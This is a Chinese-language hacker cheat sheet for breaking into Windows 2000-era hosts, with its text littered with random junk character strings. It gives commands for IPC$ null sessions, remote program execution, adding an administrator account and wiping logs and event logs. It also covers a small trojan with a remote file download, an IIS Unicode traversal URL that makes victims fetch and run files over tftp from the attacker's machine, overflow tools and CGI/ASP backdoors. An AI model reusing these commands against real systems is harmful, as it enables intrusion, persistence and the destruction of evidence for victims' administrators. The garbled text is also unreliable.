网管和黑客都必须知道的命令

admin

　　与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" , c6 I4 n. ~9 y8 C7 Q" u0 v　　以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" , d, p1 N7 y$ t' Q; R: I( W0 D　　传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ : r! o# { }4 R) k5 b+ N* K) O　　查看远程主机时间 net time \IP地址 　　定时启动某个程序 at \IP地址 02:18 readme.exe 　　查看共享 net view \IP地址 　　查看netbios工作组列表 nBTstat -A IP地址 　　将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" ( s0 g1 p f G( ?　　这两条把自己增加到管理员组： net user 用户名 密码 /add 9 m# w9 `: Z' O! W- h3 N8 x/ H5 w5 d　　net locaLGroup Administrators 用户名 /add ' N6 W4 _* ?# H: k1 e: P　　断开连接 net use \IP地址ipc$ /delete & s) p. @6 c6 P' I 1 l9 W/ d U9 h E- x2 j# A7 z　　扫尾： ; {& R$ v, M/ c2 l$ e8 m　　del C:winntsystem32logfiles*.* 　　del C:winntssytem32config*.evt ' F, d* `, z( y6 y　　del C:winntsystem32dTCLog*.* # l. C: a9 }9 ?- ~　　del C:winntsystem32*.log 5 S, v! @$ {# J8 r9 X　　del C:winntsystem32*.txt 　　del C:winnt*.txt 　　del C:winnt*.log $ j3 R; _6 g- F y' F) p! ]4 B 一、netsvc.exe 　　下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务： 　　netsvc /list \IP地址 % \0 ^" C0 C5 { a$ I) }; w　　netsvc schedule \IP地址 /query 　　netsvc \IP地址 schedule /start 二、OpenTelnet.exe 3 \5 V7 u( m A+ @　　远程启动主机的Telnet服务，并绑定端口到7878，例如： , Y3 P' q) Y* ]! \) @　　OpenTelnet \IP地址 用户名 密码 1 7878 ; _ S! y/ _) e- V+ K& f　　然后就可以telnet到主机的7878端口，进入DOS方式下： 　　telnet IP地址 7878 3 m( [ _8 _% u5 K7 t r6 a% _' \0 W三、winshell.exe + T3 X% \7 o3 a　　一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码winshell，当看到CMD>后，可打下面的命令： 　　p Path （查看winshell主程序的路径信息） 　　b reBoot （重新启动机器） 　　d shutDown （关闭机器） 9 {8 y2 p/ V" X8 `" a1 w! W9 R) Y& E　　s Shell （执行后你就会看到可爱的“C:>”） ( q9 H5 p0 k. {6 v) F+ r　　x eXit （退出本次登录会话，此命令并不终止winshell的运行） 　　CMD> http://.../srv.exe （通过http下载其他网站上的文件到运行winshell的机器上） ! L+ J0 Z$ e, G8 ^- I5 l& o ) v$ E3 r" D; Y; c- e四、3389登陆器，GUI方式登录远程主机的 6 ~8 b; S2 u3 o6 E" y 五、elsave.exe - o2 s8 |; m+ W N* h! j　　事件日志清除工具 # T4 Q) ]9 n/ [4 E　　elsave -s \IP地址 -l "application" -C 0 u% O% d6 U: o2 c　　elsave -s \IP地址 -l "system" -C 　　elsave -s \IP地址 -l "security" -C # V( f) W1 [4 q; @4 F' M　　执行后成功清除应用程序日志，系统日志，安全日志 六、hbulot.exe 　　开启win2kserver和winxp的3389服务 　　hbulot （/r） . U3 h0 c1 [; f; ~3 {! A 七、nc.exe(netcat.exe) 5 \6 V L6 r* ~　　一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。 % ^4 V7 C/ u" I　　想要连接到某处: nc （-options） hostname port（s）（ports） ... 　　绑定端口等待连接: nc -l -p port （-options） （hostname） （port） 1 L, y; _; A f5 K$ o- | 8 F# d4 X/ A' a% W- w# Y% W2 H参数: 9 ?) _% t& D& d$ f! N' r　　-e prog 程序重定向，一旦连接，就执行 （危险!） 　　-g gateway source-routing hop point（s）, up to 8 " S' c$ o1 [3 J- i　　-G num source-routing pointer: 4, 8, 12, ... - z: G0 A0 l- w% Y　　-h 帮助信息 3 |! V" ^6 A, o: e　　-i secs 延时的间隔 8 c/ [9 A1 y' X% c+ G4 ?* v8 @7 }　　-l 监听模式，用于入站连接 　　-n 指定数字的IP地址，不能用hostname 7 D9 K8 O) y8 k" ^　　-o file 记录16进制的传输 　　-p port 本地端口号 　　-r 任意指定本地及远程端口 9 i+ L0 R( D3 j3 v- I　　-s addr 本地源地址 ' N- e2 ^* }5 G' a1 Y V　　-u UDP模式 , [ A* q" c! b. V4 H* A! j3 s　　-v 详细输出——用两个-v可得到更详细的内容 　　-w secs timeout的时间 　　-z 将输入输出关掉——用于扫描时 8 r# U5 I- F. }% o# _/ B 6 ^* n6 @, D8 B/ g; G6 j s w八、TFTPD32.EXE 　　把自己的电脑临时变为一台FTP服务器，让肉鸡来下载文件，tftp命令要在肉鸡上执行，通常要利用Unicode漏洞或telnet到肉鸡，例如： 0 g6 ]& D5 x" T1 P" U# Q; K- P9 M　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 　　然后可以直接令文件运行： . L9 j' ~- h- T, s& g　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 : r- b0 ]7 j' V4 Z 九、prihack.exe是IIS的printer远程缓冲区溢出工具 9 i0 K7 m$ y! M1 B. ]　　idqover.exe是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打winxp。 ' K4 T6 d" w3 o! @" d一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor，exe要放到cgi-bin目录下，asp放到有ASP执行权限的目录。然后用IE浏览器连接.